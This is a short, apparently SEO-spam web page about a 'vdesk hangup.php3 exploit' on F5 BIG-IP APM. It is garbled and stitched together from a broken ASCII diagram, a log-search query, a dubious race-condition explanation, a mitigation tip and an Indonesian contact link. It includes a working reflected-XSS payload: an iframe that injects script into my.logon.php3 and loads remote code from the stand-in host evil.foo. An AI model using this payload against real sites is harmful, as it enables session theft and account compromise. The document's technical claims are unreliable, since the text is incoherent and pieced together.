Hangupphp3 Exploit | Vdesk

Client Browser F5 BIG-IP APM Virtual Server | | |--- 1. Request with Invalid Host ->| | | (Evaluates policy / host header) |<- 2. HTTP 302 Redirect (Hangup) --| (Triggers cleanup sequence) | | |--- 3. GET /vdesk/hangup.php3 ---->| | | (Deletes session cookies) |<- 4. Final Disconnect / Deny -----|

uri_path:"/vdesk/hangup.php3" AND status:302 AND referer:* vdesk hangupphp3 exploit

The hangup.php3 script receives the SIGHUP signal. Because the script uses pcntl_signal() without pcntl_signal_dispatch() in a safe context, it triggers an asynchronous fork. The parent process writes to the session file while the child process—intended to clean up call resources—attempts to write a log entry. This creates a race condition. Client Browser F5 BIG-IP APM Virtual Server | | |--- 1

: Ensure that your APM access policies handle authentication failures correctly. For API clients that expect 401 responses, implement iRules to prevent unwanted redirects to /vdesk/hangup.php3 . vdesk hangupphp3 exploit

<html> <iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe> </html>

Hubungi CS Klik di sini